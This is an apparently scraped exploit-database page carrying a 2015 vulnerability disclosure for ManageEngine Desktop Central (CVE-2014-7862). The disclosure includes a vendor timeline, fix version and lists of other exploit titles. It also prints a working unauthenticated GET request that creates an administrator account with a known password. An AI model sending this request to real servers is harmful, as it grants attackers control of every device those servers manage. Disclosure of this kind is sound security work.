Menu

Search for hundreds of thousands of exploits

"ManageEngine Desktop Central - Create Administrator"

Author

Exploit author

"Pedro Ribeiro"

Platform

Exploit platform

multiple

Release date

Exploit published date

2015-01-15

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
>> Administrator account creation in ManageEngine Desktop Central / Desktop Central MSP
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 31/12/2014 / Last updated: 05/01/2015

>> Background on the affected product:
"Desktop Central is an integrated desktop & mobile device management software that helps in managing the servers, laptops, desktops, smartphones and tablets from a central point. It automates your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more."

This vulnerability is being released as a 0day since ManageEngine failed to take action after 112 days. See timeline for details.

>> Technical details:
Vulnerability: Administrator account creation (unauthenticated)
CVE-2014-7862
Constraints: none; no authentication or any other information needed
Affected versions: all versions from v7 onwards

GET /servlets/DCPluginServelet?action=addPlugInUser&role=DCAdmin&userName=dcpwn&email=bla@bla.com&phNumber=123456&password=8fR%2bRoOURmY0EXsX%2bCmung%3d=&salt=1401192012599&createdtime=1337

This creates a new administrator user "dcpwn" with the password "admin". You can now execute code on all devices managed by Desktop Central!
A Metasploit auxiliary module that exploits this vulnerability has been released.

>> Fix: 
(updated 05/01/2015) Upgrade to version 9.0 build 90109 or later.

This vulnerability was initially disclosed on 31/12/2014 as a 0-day, as ManageEngine failed to take action after 112 days.

Timeline of disclosure:
11/09/2014:
- Vulnerability information sent to Romanus, Desktop Central project manager.

23/09/2014:
- Requested an update. Received reply "My development team is working on this to provide a fix. Let me check this and update you the status."

17/10/2014
- Requested an update. Received reply on the 19th "Due to festive season here i'm unable to get the update. Let me find this and update you by Monday."

30/10/2014
- Requested an update. Received reply "The development and testing of the reported part should get over in another 3 weeks and when it is ready for release build I'll send it for testing."

23/11/2014
- Requested an update. Received reply on the 24th "I was traveling hence couldn't give you an update.  It should get released by next week or early second week. I'll send you an update on this."

15/12/2014
- Requested an update. Received reply on the 18th "it has been handled from the Desktop Central side and awaiting for the release".

31/12/2014
- Released information and exploit 112 days after initial disclosure.

================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2019-08-21 "Cisco UCS Director_ Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data - Multiple Vulnerabilities" remote multiple "Pedro Ribeiro"
2018-01-22 "AsusWRT Router < 3.0.0.4.380.7743 - LAN Remote Code Execution" remote hardware "Pedro Ribeiro"
2017-03-24 "NETGEAR WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)" remote hardware "Pedro Ribeiro"
2017-01-31 "Billion / TrueOnline / ZyXEL Routers - Multiple Vulnerabilities" webapps hardware "Pedro Ribeiro"
2016-12-21 "NETGEAR WNR2000v5 - Remote Code Execution" remote cgi "Pedro Ribeiro"
2016-08-10 "WebNMS Framework Server 5.2/5.2 SP1 - Multiple Vulnerabilities" webapps jsp "Pedro Ribeiro"
2016-08-05 "NUUO NVRmini2 / NVRsolo / Crystal Devices / NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities" remote hardware "Pedro Ribeiro"
2016-04-11 "Novell ServiceDesk 6.5/7.0.3/7.1.0 - Multiple Vulnerabilities" webapps jsp "Pedro Ribeiro"
2016-02-04 "NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities" webapps hardware "Pedro Ribeiro"
2015-09-29 "Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (2)" webapps asp "Pedro Ribeiro"
2015-09-28 "BMC Track-It! 11.4 - Multiple Vulnerabilities" webapps windows "Pedro Ribeiro"
2015-09-28 "Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - (Authenticated) Arbitrary File Upload" webapps asp "Pedro Ribeiro"
2015-07-15 "Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (1)" webapps windows "Pedro Ribeiro"
2015-06-10 "ICU library 52 < 54 - Multiple Vulnerabilities" local multiple "Pedro Ribeiro"
2015-06-10 "SysAid Help Desk 14.4 - Multiple Vulnerabilities" webapps hardware "Pedro Ribeiro"
2015-04-08 "Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution" webapps jsp "Pedro Ribeiro"
2015-02-09 "ManageEngine OpManager / Applications Manager / IT360 - 'FailOverServlet' Multiple Vulnerabilities" webapps multiple "Pedro Ribeiro"
2015-01-18 "Lorex LH300 Series - ActiveX Buffer Overflow (PoC)" dos hardware "Pedro Ribeiro"
2015-01-15 "ManageEngine Desktop Central - Create Administrator" webapps multiple "Pedro Ribeiro"
2014-12-03 "ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download" webapps multiple "Pedro Ribeiro"
2014-11-10 "Password Manager Pro / Pro MSP - Blind SQL Injection" webapps multiple "Pedro Ribeiro"
2014-11-10 "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities" webapps jsp "Pedro Ribeiro"
2014-11-09 "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities" webapps multiple "Pedro Ribeiro"
2014-11-05 "ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2)" webapps multiple "Pedro Ribeiro"
2014-10-12 "CMS Made Simple 1.11.9 - Multiple Vulnerabilities" webapps php "Pedro Ribeiro"
2014-10-12 "Pimcore CMS 1.4.9 <2.1.0 - Multiple Vulnerabilities" webapps hardware "Pedro Ribeiro"
2014-10-12 "GetSimple CMS 3.3.1 - Cross-Site Scripting" webapps php "Pedro Ribeiro"
2014-10-09 "BMC Track-It! - Multiple Vulnerabilities" webapps windows "Pedro Ribeiro"
2014-10-02 "ManageEngine OpManager / Social IT - Arbitrary File Upload (Metasploit)" remote java "Pedro Ribeiro"
2014-09-01 "ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution" webapps jsp "Pedro Ribeiro" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected